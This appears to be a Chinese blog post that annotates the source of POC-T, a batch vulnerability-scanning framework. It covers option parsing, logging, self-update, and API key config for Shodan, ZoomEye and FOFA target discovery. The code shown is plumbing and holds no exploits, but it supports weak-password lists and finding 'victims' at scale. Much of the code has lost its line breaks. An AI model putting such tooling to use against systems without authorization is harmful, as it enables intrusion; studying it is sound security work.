本节续前面的第6节继续分析源代码：

core子目录————项目的核心

1、__init__.py（初始化）

2、common.py（公共函数脚本）

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.meimport os
import re
import sys
import time
import logging
import webbrowser
from lib.core.data import *
from lib.core.exception import *
from lib.core.log import LOGGER_HANDLER
from lib.core.settings import BANNER, UNICODE_ENCODING, NULL, INVALID_UNICODE_CHAR_FORMAT
from lib.core.convert import stdoutencode
from lib.core.enums import EXIT_STATUS, ENGINE_MODE_STATUS
from thirdparty.termcolor.termcolor import colored
from thirdparty.odict.odict import OrderedDict#设置项目的路径
def setPaths():"""Sets absolute paths for project directories and files"""root_path = paths.ROOT_PATHpaths.DATA_PATH = os.path.join(root_path, "data")paths.SCRIPT_PATH = os.path.join(root_path, "script")paths.OUTPUT_PATH = os.path.join(root_path, "output")paths.CONFIG_PATH = os.path.join(root_path, "toolkit.conf")if not os.path.exists(paths.SCRIPT_PATH):os.mkdir(paths.SCRIPT_PATH)if not os.path.exists(paths.OUTPUT_PATH):os.mkdir(paths.OUTPUT_PATH)if not os.path.exists(paths.DATA_PATH):os.mkdir(paths.DATA_PATH)paths.WEAK_PASS = os.path.join(paths.DATA_PATH, "pass100.txt")paths.LARGE_WEAK_PASS = os.path.join(paths.DATA_PATH, "pass1000.txt")paths.UA_LIST_PATH = os.path.join(paths.DATA_PATH, "user-agents.txt")if os.path.isfile(paths.CONFIG_PATH) and os.path.isfile(paths.WEAK_PASS) and os.path.isfile(paths.LARGE_WEAK_PASS) and os.path.isfile(paths.UA_LIST_PATH):passelse:msg = 'Some files missing, it may cause an issue.\n'msg += 'Please use \'--update\' to get the complete program from github.com.'raise ToolkitMissingPrivileges(msg)#检查文件是否存在以及文件权限(读写权限)
def checkFile(filename):"""function Checks for file existence and readability"""valid = Trueif filename is None or not os.path.isfile(filename):valid = Falseif valid:try:with open(filename, "rb"):passexcept IOError:valid = Falseif not valid:raise ToolkitSystemException("unable to read file '%s'" % filename)#banner信息
def banner():"""Function prints banner with its version"""_ = BANNERif not getattr(LOGGER_HANDLER, "is_tty", False):_ = re.sub("\033.+?m", "", _)dataToStdout(_)#输出流
def dataToStdout(data, bold=False):"""Writes text to the stdout (console) stream"""if conf.SCREEN_OUTPUT:if conf.ENGINE is ENGINE_MODE_STATUS.THREAD:logging._acquireLock()if isinstance(data, unicode):message = stdoutencode(data)else:message = datasys.stdout.write(setColor(message, bold))try:sys.stdout.flush()except IOError:passif conf.ENGINE is ENGINE_MODE_STATUS.THREAD:logging._releaseLock()return#颜色设置
def setColor(message, bold=False):retVal = messageif message and getattr(LOGGER_HANDLER, "is_tty", False):  # colorizing handlerif bold:retVal = colored(message, color=None, on_color=None, attrs=("bold",))return retVal#进程
def pollProcess(process, suppress_errors=False):"""Checks for process status (prints > if still running)"""while True:message = '>'sys.stdout.write(message)try:sys.stdout.flush()except IOError:passtime.sleep(1)returncode = process.poll()if returncode is not None:if not suppress_errors:if returncode == 0:print " done\n"elif returncode < 0:print " process terminated by signal %d\n" % returncodeelif returncode > 0:print " quit unexpectedly with return code %d\n" % returncodebreakdef getSafeExString(ex, encoding=None):"""Safe way how to get the proper exception represtation as a string(Note: errors to be avoided: 1) "%s" % Exception(u'\u0161') and 2) "%s" % str(Exception(u'\u0161'))"""retVal = exif getattr(ex, "message", None):retVal = ex.messageelif getattr(ex, "msg", None):retVal = ex.msgreturn getUnicode(retVal, encoding=encoding)def getUnicode(value, encoding=None, noneToNull=False):"""Return the unicode representation of the supplied value:>>> getUnicode(u'test')u'test'>>> getUnicode('test')u'test'>>> getUnicode(1)u'1'"""if noneToNull and value is None:return NULLif isListLike(value):value = list(getUnicode(_, encoding, noneToNull) for _ in value)return valueif isinstance(value, unicode):return valueelif isinstance(value, basestring):while True:try:return unicode(value, encoding or UNICODE_ENCODING)except UnicodeDecodeError, ex:try:return unicode(value, UNICODE_ENCODING)except Exception:value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]else:try:return unicode(value)except UnicodeDecodeError:return unicode(str(value), errors="ignore")  # encoding ignored for non-basestring instancesdef isListLike(value):"""Returns True if the given value is a list-like instance>>> isListLike([1, 2, 3])True>>> isListLike(u'2')False"""return isinstance(value, (list, tuple, set))#系统退出
def systemQuit(status=EXIT_STATUS.SYSETM_EXIT):if status == EXIT_STATUS.SYSETM_EXIT:logger.info('System exit.')elif status == EXIT_STATUS.USER_QUIT:logger.error('User quit!')elif status == EXIT_STATUS.ERROR_EXIT:logger.error('System exit.')else:raise ToolkitValueException('Invalid status code: %s' % str(status))sys.exit(0)#获取文件的内容
def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, unique=False):"""@function returns newline delimited items contained inside file"""retVal = list() if not unique else OrderedDict()checkFile(filename)try:with open(filename, 'r') as f:for line in (f.readlines() if unicode_ else f.xreadlines()):# xreadlines doesn't return unicode strings when codecs.open() is usedif commentPrefix and line.find(commentPrefix) != -1:line = line[:line.find(commentPrefix)]line = line.strip()if not unicode_:try:line = str.encode(line)except UnicodeDecodeError:continueif line:if lowercase:line = line.lower()if unique and line in retVal:continueif unique:retVal[line] = Trueelse:retVal.append(line)except (IOError, OSError, MemoryError), ex:errMsg = "something went wrong while trying "errMsg += "to read the content of file '%s' ('%s')" % (filename, ex)raise ToolkitSystemException(errMsg)return retVal if not unique else retVal.keys()#使用浏览器打开
def openBrowser():path = conf.OUTPUT_FILE_PATHtry:webbrowser.open_new_tab(path)except Exception:errMsg = '\n[ERROR] Fail to open file with web browser: %s' % pathraise ToolkitSystemException(errMsg)

3、convert.py（输出编码）

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.meimport sys
from lib.core.settings import IS_WIN, UNICODE_ENCODINGdef singleTimeWarnMessage(message):  # Cross-linked functionsys.stdout.write(message)sys.stdout.write("\n")sys.stdout.flush()#对输出内容进行Unicode编码处理
def stdoutencode(data):retVal = Nonetry:data = data or ""# Reference: http://bugs.python.org/issue1602if IS_WIN:output = data.encode(sys.stdout.encoding, "replace")if '?' in output and '?' not in data:warnMsg = "cannot properly display Unicode characters "warnMsg += "inside Windows OS command prompt "warnMsg += "(http://bugs.python.org/issue1602). All "warnMsg += "unhandled occurances will result in "warnMsg += "replacement with '?' character. Please, find "warnMsg += "proper character representation inside "warnMsg += "corresponding output files. "singleTimeWarnMessage(warnMsg)retVal = outputelse:retVal = data.encode(sys.stdout.encoding)except Exception:retVal = data.encode(UNICODE_ENCODING) if isinstance(data, unicode) else datareturn retVal

4、data.py

5、datatype.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.meimport copy
import types
from lib.core.exception import ToolkitDataExceptionclass AttribDict(dict):"""This class defines the project object, inheriting from Python datatype dictionary.>>> foo = AttribDict()>>> foo.bar = 1>>> foo.bar1"""def __init__(self, indict=None, attribute=None):if indict is None:indict = {}# Set any attributes here - before initialisation# these remain as normal attributesself.attribute = attributedict.__init__(self, indict)self.__initialised = True# After initialisation, setting attributes# is the same as setting an itemdef __getattr__(self, item):"""Maps values to attributesOnly called if there *is NOT* an attribute with this name"""try:return self.__getitem__(item)except KeyError:raise ToolkitDataException("unable to access item '%s'" % item)def __setattr__(self, item, value):"""Maps attributes to valuesOnly if we are initialised"""# This test allows attributes to be set in the __init__ methodif "_AttribDict__initialised" not in self.__dict__:return dict.__setattr__(self, item, value)# Any normal attributes are handled normallyelif item in self.__dict__:dict.__setattr__(self, item, value)else:self.__setitem__(item, value)def __getstate__(self):return self.__dict__def __setstate__(self, dict):self.__dict__ = dictdef __deepcopy__(self, memo):retVal = self.__class__()memo[id(self)] = retValfor attr in dir(self):if not attr.startswith('_'):value = getattr(self, attr)if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)):setattr(retVal, attr, copy.deepcopy(value, memo))for key, value in self.items():retVal.__setitem__(key, copy.deepcopy(value, memo))return retVal

6、enums.py

7、exception（异常）

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.meclass ToolkitBaseException(Exception):passclass ToolkitConnectionException(Exception):passclass ToolkitDataException(ToolkitBaseException):passclass ToolkitMissingPrivileges(ToolkitBaseException):passclass ToolkitUserQuitException(ToolkitBaseException):passclass ToolkitSystemException(ToolkitBaseException):passclass ToolkitValueException(ToolkitBaseException):passclass ToolkitPluginException(ToolkitBaseException):passclass RegisterException(Exception):passclass RegisterValueException(RegisterException):passclass RegisterDataException(RegisterException):passclass RegisterMutexException(RegisterException):pass

8、log.py（日志：成功、提示、警告、错误）

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.meimport logging
import sysfrom lib.core.enums import CUSTOM_LOGGINGlogging.addLevelName(CUSTOM_LOGGING.SYSINFO, "*")
logging.addLevelName(CUSTOM_LOGGING.SUCCESS, "+")
logging.addLevelName(CUSTOM_LOGGING.ERROR, "-")
logging.addLevelName(CUSTOM_LOGGING.WARNING, "!")LOGGER = logging.getLogger("TookitLogger")LOGGER_HANDLER = None
try:from thirdparty.ansistrm.ansistrm import ColorizingStreamHandlertry:LOGGER_HANDLER = ColorizingStreamHandler(sys.stdout)LOGGER_HANDLER.level_map[logging.getLevelName("*")] = (None, "cyan", False)LOGGER_HANDLER.level_map[logging.getLevelName("+")] = (None, "green", False)LOGGER_HANDLER.level_map[logging.getLevelName("-")] = (None, "red", False)LOGGER_HANDLER.level_map[logging.getLevelName("!")] = (None, "yellow", False)except Exception:LOGGER_HANDLER = logging.StreamHandler(sys.stdout)except ImportError:LOGGER_HANDLER = logging.StreamHandler(sys.stdout)FORMATTER = logging.Formatter("\r[%(levelname)s] %(message)s", "%H:%M:%S")LOGGER_HANDLER.setFormatter(FORMATTER)
LOGGER.addHandler(LOGGER_HANDLER)
LOGGER.setLevel(CUSTOM_LOGGING.WARNING)class MY_LOGGER:@staticmethoddef success(msg):return LOGGER.log(CUSTOM_LOGGING.SUCCESS, msg)@staticmethoddef info(msg):return LOGGER.log(CUSTOM_LOGGING.SYSINFO, msg)@staticmethoddef warning(msg):return LOGGER.log(CUSTOM_LOGGING.WARNING, msg)@staticmethoddef error(msg):return LOGGER.log(CUSTOM_LOGGING.ERROR, msg)

9、option.py（参数选项解析）

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.meimport os
import glob
import time
import sys
from lib.core.data import conf, paths, th, logger
from lib.core.enums import TARGET_MODE_STATUS, ENGINE_MODE_STATUS
from lib.utils.update import update
from lib.core.enums import API_MODE_NAME
from lib.core.register import Register#初始化选项
def initOptions(args):checkUpdate(args)                checkShow(args)                   EngineRegister(args)ScriptRegister(args)TargetRegister(args)ApiRegister(args)Output(args)Misc(args)#检查框架的更新
def checkUpdate(args):if args.sys_update:update()#初始化信息显示
def checkShow(args):show_scripts = args.show_scriptsif show_scripts:module_name_list = glob.glob(os.path.join(paths.SCRIPT_PATH, '*.py'))msg = 'Script Name (total:%s)\n' % str(len(module_name_list) - 1)for each in module_name_list:_str = os.path.splitext(os.path.split(each)[1])[0]if _str not in ['__init__']:msg += '  %s\n' % _strsys.exit(logger.info(msg))#线程与进程初始化
def EngineRegister(args):thread_status = args.engine_thread   #线程gevent_status = args.engine_gevent   #协程thread_num = args.thread_num         #线程数def __thread():conf.ENGINE = ENGINE_MODE_STATUS.THREADdef __gevent():conf.ENGINE = ENGINE_MODE_STATUS.GEVENTconf.ENGINE = ENGINE_MODE_STATUS.THREAD  # default choicemsg = 'Use [-eT] to set Multi-Threaded mode or [-eG] to set Coroutine mode.'r = Register(mutex=True, start=0, stop=1, mutex_errmsg=msg)r.add(__thread, thread_status)r.add(__gevent, gevent_status)r.run()if 0 < thread_num < 101:th.THREADS_NUM = conf.THREADS_NUM = thread_numelse:msg = 'Invalid input in [-t], range: 1 to 100'sys.exit(logger.error(msg))#脚本选项初始化
def ScriptRegister(args):input_path = args.script_name# handle input: nothingif not input_path:msg = 'Use -s to load script. Example: [-s spider] or [-s ./script/spider.py]'sys.exit(logger.error(msg))# handle input: "-s ./script/spider.py"if os.path.split(input_path)[0]:if os.path.exists(input_path):if os.path.isfile(input_path):if input_path.endswith('.py'):conf.MODULE_NAME = os.path.split(input_path)[-1]conf.MODULE_FILE_PATH = os.path.abspath(input_path)else:msg = '[%s] not a Python file. Example: [-s spider] or [-s ./script/spider.py]' % input_pathsys.exit(logger.error(msg))else:msg = '[%s] not a file. Example: [-s spider] or [-s ./script/spider.py]' % input_pathsys.exit(logger.error(msg))else:msg = '[%s] not found. Example: [-s spider] or [-s ./script/spider.py]' % input_pathsys.exit(logger.error(msg))# handle input: "-s spider"  "-s spider.py"else:if not input_path.endswith('.py'):input_path += '.py'_path = os.path.abspath(os.path.join(paths.SCRIPT_PATH, input_path))if os.path.isfile(_path):conf.MODULE_NAME = input_pathconf.MODULE_FILE_PATH = os.path.abspath(_path)else:msg = 'Script [%s] not exist. Use [--show] to view all available script in ./script/' % input_pathsys.exit(logger.error(msg))#目标选项初始化
def TargetRegister(args):input_file = args.target_fileinput_single = args.target_singleinput_network = args.target_networkinput_array = args.target_arrayapi_zoomeye = args.zoomeye_dorkapi_shodan = args.shodan_dorkapi_google = args.google_dorkapi_fofa = args.fofa_dorkdef __file():if not os.path.isfile(input_file):msg = 'TargetFile not found: %s' % input_filesys.exit(logger.error(msg))conf.TARGET_MODE = TARGET_MODE_STATUS.FILEconf.INPUT_FILE_PATH = input_filedef __array():help_str = "Invalid input in [-iA], Example: -iA 1-100"try:_int = input_array.strip().split('-')if int(_int[0]) < int(_int[1]):if int(_int[1]) - int(_int[0]) > 1000000:warnMsg = "Loading %d targets, Maybe it's too much, continue? [y/N]" % (int(_int[1]) - int(_int[0]))logger.warning(warnMsg)a = raw_input()if a in ('Y', 'y', 'yes'):passelse:msg = 'User quit!'sys.exit(logger.error(msg))else:sys.exit(logger.error(help_str))except Exception:sys.exit(logger.error(help_str))conf.TARGET_MODE = TARGET_MODE_STATUS.RANGEconf.I_NUM2 = input_arrayconf.INPUT_FILE_PATH = None#选项参数解析def __network():conf.TARGET_MODE = TARGET_MODE_STATUS.IPMASKconf.NETWORK_STR = input_networkconf.INPUT_FILE_PATH = Nonedef __single():conf.TARGET_MODE = TARGET_MODE_STATUS.SINGLEconf.SINGLE_TARGET_STR = input_singleth.THREADS_NUM = conf.THREADS_NUM = 1conf.INPUT_FILE_PATH = Nonedef __zoomeye():conf.TARGET_MODE = TARGET_MODE_STATUS.APIconf.API_MODE = API_MODE_NAME.ZOOMEYEconf.API_DORK = api_zoomeyedef __shodan():conf.TARGET_MODE = TARGET_MODE_STATUS.APIconf.API_MODE = API_MODE_NAME.SHODANconf.API_DORK = api_shodandef __google():conf.TARGET_MODE = TARGET_MODE_STATUS.APIconf.API_MODE = API_MODE_NAME.GOOGLEconf.API_DORK = api_googledef __fofa():conf.TARGET_MODE = TARGET_MODE_STATUS.APIconf.API_MODE = API_MODE_NAME.FOFAconf.API_DORK = api_fofamsg = 'Please load targets with [-iS|-iA|-iF|-iN] or use API with [-aZ|-aS|-aG|-aF]'r = Register(mutex=True, mutex_errmsg=msg)r.add(__file, input_file)r.add(__network, input_network)r.add(__array, input_array)r.add(__single, input_single)r.add(__zoomeye, api_zoomeye)r.add(__shodan, api_shodan)r.add(__google, api_google)r.add(__fofa, api_fofa)r.run()#api选项初始化
def ApiRegister(args):search_type = args.search_typeoffset = args.api_offsetgoogle_proxy = args.google_proxyapi_limit = args.api_limitif not 'API_MODE' in conf:returnif not conf.API_DORK:msg = 'Empty API dork, show usage with [-h]'sys.exit(logger.error(msg))if offset < 0:msg = 'Invalid value in [--offset], show usage with [-h]'sys.exit(logger.error(msg))else:conf.API_OFFSET = offset# handle typeError in cmdline.pyif api_limit <= 0:msg = 'Invalid value in [--limit], show usage with [-h]'sys.exit(logger.error(msg))else:conf.API_LIMIT = api_limitif conf.API_MODE is API_MODE_NAME.ZOOMEYE:if search_type not in ['web', 'host']:msg = 'Invalid value in [--search-type], show usage with [-h]'sys.exit(logger.error(msg))else:conf.ZOOMEYE_SEARCH_TYPE = search_typeelif conf.API_MODE is API_MODE_NAME.GOOGLE:conf.GOOGLE_PROXY = google_proxy#输出
def Output(args):output_file = args.output_pathfile_status = args.output_file_statusscreen_status = args.output_screen_statusbrowser = args.open_browserif not file_status and output_file:msg = 'Cannot use [-oF] and [-o] together, please read the usage with [-h].'sys.exit(logger.error(msg))if not file_status and browser:msg = '[--browser] is based on file output, please remove [-oF] in your command and try again.'sys.exit(logger.error(msg))conf.SCREEN_OUTPUT = screen_statusconf.FILE_OUTPUT = file_statusconf.OUTPUT_FILE_PATH = os.path.abspath(output_file) if output_file else \os.path.abspath(os.path.join(paths.OUTPUT_PATH, time.strftime('[%Y%m%d-%H%M%S]', time.localtime(time.time())) + conf.MODULE_NAME + '.txt'))def Misc(args):conf.SINGLE_MODE = args.single_modeconf.OPEN_BROWSER = args.open_browser

10、register.py（用于注册互斥的参数并给出错误提示）

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me"""
用于注册互斥的参数并给出错误提示Register()start         最少通过量stop          最大通过量mutex         互斥开关mutex_errmsg  错误提示add()perform       目标函数trigger       触发条件args          参数传入kwargs        参数传入Usage:r = Register()r.add(function1,1>1)r.add(function2,2>1)r.add(function3,3>1)r.run()"""import types
import sys
from lib.core.data import logger
from lib.core.exception import RegisterDataException, RegisterMutexException, RegisterValueExceptionclass Register:def __init__(self, start=1, stop=1, mutex_errmsg=None, mutex=True):self.targets = []self.mutex = mutexself.start = startself.stop = stopself.mutex_errmsg = mutex_errmsgself.verified = []def enable_mutex(self):self.mutex = Truedef set_mutex_errmsg(self, s):self.mutex_errmsg = str(s)def add(self, perform, trigger, args=(), kwargs=None):if kwargs is None:kwargs = {}d = {'perform': perform, 'args': args, 'kwargs': kwargs, 'trigger': trigger}self.targets.append(d)self.__args = argsself.__kwargs = kwargsdef run(self):self.__pretreat()for target in self.verified:if not target.get('perform'):msg = 'Register has no verified target'raise RegisterDataException(msg)target.get('perform')(*target.get('args'), **target.get('kwargs'))def __pretreat(self):self.__input_vector_check()for __target in self.targets:__trigger = __target.get('trigger')if type(__trigger) is types.BooleanType or type(__trigger) is types.StringType:if __trigger:self.verified.append(__target)else:msg = '[Trigger Type Error] Expected:boolean,found:' + str(type(__trigger))raise RegisterValueException(msg)self.__mutex_check()def __mutex_check(self):if self.mutex:if len(self.verified) < self.start or len(self.verified) > self.stop:if self.mutex_errmsg is None:raise RegisterMutexException('mutex error,verified func count: ' + str(len(self.verified)))else:sys.exit(logger.error(self.mutex_errmsg))def __input_vector_check(self):if type(self.stop) is types.IntType and type(self.start) is types.IntType and type(self.mutex) is types.BooleanType:passelse:raise RegisterValueException('Register init func type error')if len(self.targets) is 0:msg = 'no target'raise RegisterDataException(msg)if self.start > self.stop:msg = 'start > stop'raise RegisterDataException(msg)

11、revision.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.meimport os
import refrom subprocess import PIPE
from subprocess import Popen as executedef getRevisionNumber():"""Returns abbreviated commit hash number as retrieved with "git rev-parse --short HEAD""""retVal = NonefilePath = None_ = os.path.dirname(__file__)while True:filePath = os.path.join(_, ".git", "HEAD")if os.path.exists(filePath):breakelse:filePath = Noneif _ == os.path.dirname(_):breakelse:_ = os.path.dirname(_)while True:if filePath and os.path.isfile(filePath):with open(filePath, "r") as f:content = f.read()filePath = Noneif content.startswith("ref: "):filePath = os.path.join(_, ".git", content.replace("ref: ", "")).strip()else:match = re.match(r"(?i)[0-9a-f]{32}", content)retVal = match.group(0) if match else Nonebreakelse:breakif not retVal:process = execute("git rev-parse --verify HEAD", shell=True, stdout=PIPE, stderr=PIPE)stdout, _ = process.communicate()match = re.search(r"(?i)[0-9a-f]{32}", stdout or "")retVal = match.group(0) if match else Nonereturn retVal[:7] if retVal else None

12、settings.py(设置)

parse子目录

1、__init__.py

2、cmdline.py（命令行中参数选项说明）

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.meimport argparse
import sys
from lib.core.settings import VERSIONdef cmdLineParser():parser = argparse.ArgumentParser(description='powered by cdxy <mail:i@cdxy.me> ',usage='python POC-T.py -s bingc -aZ "port:8080"',add_help=False)engine = parser.add_argument_group('ENGINE')engine.add_argument('-eT', dest="engine_thread", default=False, action='store_true',help='Multi-Threaded engine (default choice)')engine.add_argument('-eG', dest="engine_gevent", default=False, action='store_true',help='Gevent engine (single-threaded with asynchronous)')engine.add_argument('-t', metavar='NUM', dest="thread_num", type=int, default=10,help='num of threads/concurrent, 10 by default')script = parser.add_argument_group('SCRIPT')script.add_argument('-s', metavar='NAME', dest="script_name", type=str, default='',help='load script by name (-s jboss-rce) or path (-s ./script/jboss.py)')target = parser.add_argument_group('TARGET')target.add_argument('-iS', metavar='TARGET', dest="target_single", type=str, default='',help="scan a single target (e.g. www.wooyun.org)")target.add_argument('-iF', metavar='FILE', dest="target_file", type=str, default='',help='load targets from targetFile (e.g. ./data/wooyun_domain)')target.add_argument('-iA', metavar='START-END', dest="target_array", type=str, default='',help='generate array from int(start) to int(end) (e.g. 1-100)')target.add_argument('-iN', metavar='IP/MASK', dest="target_network", type=str, default='',help='generate IP from IP/MASK. (e.g. 127.0.0.0/24)')api = parser.add_argument_group('API')api.add_argument('-aZ', '--zoomeye', metavar='DORK', dest="zoomeye_dork", type=str, default='',help='ZoomEye dork (e.g. "zabbix port:8080")')api.add_argument('-aS', '--shodan', metavar='DORK', dest="shodan_dork", type=str, default='',help='Shodan dork.')api.add_argument('-aG', '--google', metavar='DORK', dest="google_dork", type=str, default='',help='Google dork (e.g. "inurl:admin.php")')api.add_argument('-aF', '--fofa', metavar='DORK', dest="fofa_dork", type=str, default='',help='FoFa dork (e.g. "banner=users && protocol=ftp")')api.add_argument('--limit', metavar='NUM', dest="api_limit", type=int, default=10,help='Maximum searching results (default:10)')api.add_argument('--offset', metavar='OFFSET', dest="api_offset", type=int, default=0,help="Search offset to begin getting results from (default:0)")api.add_argument('--search-type', metavar='TYPE', dest="search_type", action="store", default='host',help="[ZoomEye] search type used in ZoomEye API, web or host (default:host)")api.add_argument('--gproxy', metavar='PROXY', dest="google_proxy", action="store", default=None,help="[Google] Use proxy for Google (e.g. \"sock5 127.0.0.1 7070\" or \"http 127.0.0.1 1894\"")output = parser.add_argument_group('OUTPUT')output.add_argument('-o', metavar='FILE', dest="output_path", type=str, default='',help='output file path&name. default in ./output/')output.add_argument('-oF', '--no-file', dest="output_file_status", default=True, action='store_false',help='disable file output')output.add_argument('-oS', '--no-screen', dest="output_screen_status", default=True, action='store_false',help='disable screen output')misc = parser.add_argument_group('MISC')misc.add_argument('--single', dest="single_mode", default=False, action='store_true',help='exit after finding the first victim/password.')misc.add_argument('--show', dest="show_scripts", default=False, action='store_true',help='show available script names in ./script/ and exit')misc.add_argument('--browser', dest="open_browser", default=False, action='store_true',help='Open notepad or web browser to view report after task finished.')system = parser.add_argument_group('SYSTEM')system.add_argument('-v', '--version', action='version', version=VERSION,help="show program's version number and exit")system.add_argument('-h', '--help', action='help',help='show this help message and exit')system.add_argument('--update', dest="sys_update", default=False, action='store_true',help='update POC-T from github source')if len(sys.argv) == 1:sys.argv.append('-h')args = parser.parse_args()return args

utils子目录

1、__init__.py

2、config.py（配置：各个平台API的认证参数）

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.meimport ConfigParser
from lib.core.data import paths, logger
from lib.core.common import getSafeExStringclass ConfigFileParser:@staticmethoddef _get_option(section, option):try:cf = ConfigParser.ConfigParser()cf.read(paths.CONFIG_PATH)return cf.get(section=section, option=option)except ConfigParser.NoOptionError, e:logger.warning('Missing essential options, please check your config-file.')logger.error(getSafeExString(e))return ''def ZoomEyeEmail(self):return self._get_option('zoomeye', 'email')def ZoomEyePassword(self):return self._get_option('zoomeye', 'password')def ShodanApikey(self):return self._get_option('shodan', 'api_key')def BingApikey(self):return self._get_option('bing', 'api_key')def CloudEyeApikey(self):return self._get_option('cloudeye', 'api_key')def ColudEyePersonaldomain(self):return self._get_option('cloudeye', 'personal_domain')def GoogleProxy(self):return self._get_option('google', 'proxy')def GoogleDeveloperKey(self):return self._get_option('google', 'developer_key')def GoogleEngine(self):return self._get_option('google', 'search_engine')def FofaEmail(self):return self._get_option('fofa','email')def FofaKey(self):return self._get_option('fofa','api_key')

3、console.py（终端配置：分linux和window两类）

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me"""
getTerminalSize()- get width and height of console- works on linux,os x,windows,cygwin(windows)
"""import os__all__ = ['getTerminalSize']def getTerminalSize():import platformcurrent_os = platform.system()tuple_xy = Noneif current_os == 'Windows':tuple_xy = _getTerminalSize_windows()if tuple_xy is None:tuple_xy = _getTerminalSize_tput()# needed for window's python in cygwin's xterm!if current_os == 'Linux' or current_os == 'Darwin' or current_os.startswith('CYGWIN'):tuple_xy = _getTerminalSize_linux()if tuple_xy is None:print "default"tuple_xy = (80, 25)  # default valuereturn tuple_xydef _getTerminalSize_windows():res = Nonetry:from ctypes import windll, create_string_buffer# stdin handle is -10# stdout handle is -11# stderr handle is -12h = windll.kernel32.GetStdHandle(-12)csbi = create_string_buffer(22)res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)except Exception:return Noneif res:import struct(bufx, bufy, curx, cury, wattr,left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)sizex = right - left + 1sizey = bottom - top + 1return sizex, sizeyelse:return Nonedef _getTerminalSize_tput():# get terminal width# src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-windowtry:import subprocessproc = subprocess.Popen(["tput", "cols"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)output = proc.communicate(input=None)cols = int(output[0])proc = subprocess.Popen(["tput", "lines"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)output = proc.communicate(input=None)rows = int(output[0])return (cols, rows)except Exception:return Nonedef _getTerminalSize_linux():def ioctl_GWINSZ(fd):try:import fcntl, termios, structcr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))except Exception:return Nonereturn crcr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)if not cr:try:fd = os.open(os.ctermid(), os.O_RDONLY)cr = ioctl_GWINSZ(fd)os.close(fd)except Exception:passif not cr:try:cr = (env.get('LINES'), env.get('COLUMNS'))except Exception:return Nonereturn int(cr[1]), int(cr[0])if __name__ == "__main__":sizex, sizey = getTerminalSize()print  'width =', sizex, 'height =', sizey

4、update.py（框架整体更新）

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.meimport locale
import os
import re
import sys
from subprocess import PIPE
from subprocess import Popen as execute
from lib.core.common import getSafeExString
from lib.core.common import pollProcess
from lib.core.data import logger
from lib.core.data import paths
from lib.core.settings import GIT_REPOSITORY
from lib.core.settings import IS_WIN
from lib.core.revision import getRevisionNumberdef update():success = Falseif not os.path.exists(os.path.join(paths.ROOT_PATH, ".git")):errMsg = "not a git repository. Please checkout the 'Xyntax/POC-T' repository "errMsg += "from GitHub (e.g. 'git clone https://github.com/Xyntax/POC-T.git POC-T')"logger.error(errMsg)else:infoMsg = "updating POC-T to the latest development version from the "infoMsg += "GitHub repository"logger.info(infoMsg)debugMsg = "POC-T will try to update itself using 'git' command"logger.info(debugMsg)logger.info("update in progress ")try:process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE,stderr=PIPE, cwd=paths.ROOT_PATH.encode(locale.getpreferredencoding()))  # Reference: http://blog.stastnarodina.com/honza-en/spot/python-unicodeencodeerror/pollProcess(process, True)stdout, stderr = process.communicate()success = not process.returncodeexcept (IOError, OSError), ex:success = Falsestderr = getSafeExString(ex)if success:_ = getRevisionNumber()logger.info("%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", _))else:if "Not a git repository" in stderr:errMsg = "not a valid git repository. Please checkout the 'Xyntax/POC-T' repository "errMsg += "from GitHub (e.g. 'git clone https://github.com/Xyntax/POC-T.git POC-T')"logger.error(errMsg)else:logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip())if not success:if IS_WIN:infoMsg = "for Windows platform it's recommended "infoMsg += "to use a GitHub for Windows client for updating "infoMsg += "purposes (http://windows.github.com/) or just "infoMsg += "download the latest snapshot from "infoMsg += "https://github.com/Xyntax/POC-T/archive/master.zip"else:infoMsg = "for Linux platform it's required "infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')"logger.info(infoMsg)sys.exit(0)

5、versioncheck.py（python的版本检查）

plugin目录

1、__init__.py（初始化）

2、cloudeye.py(cloudEye API)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me"""
CloudEye APIUsage:c = CloudEye()a = c.getRandomDomain('cdxy')try:requests.get('http://' + a, timeout=1)except Exception:passprint c.verifyDNS(delay=0)print c.verifyHTTP(delay=0)print c.getDnsRecord(delay=0)print c.getHttpRecord(delay=0)
"""import random
import requests
import time
from string import ascii_lowercase
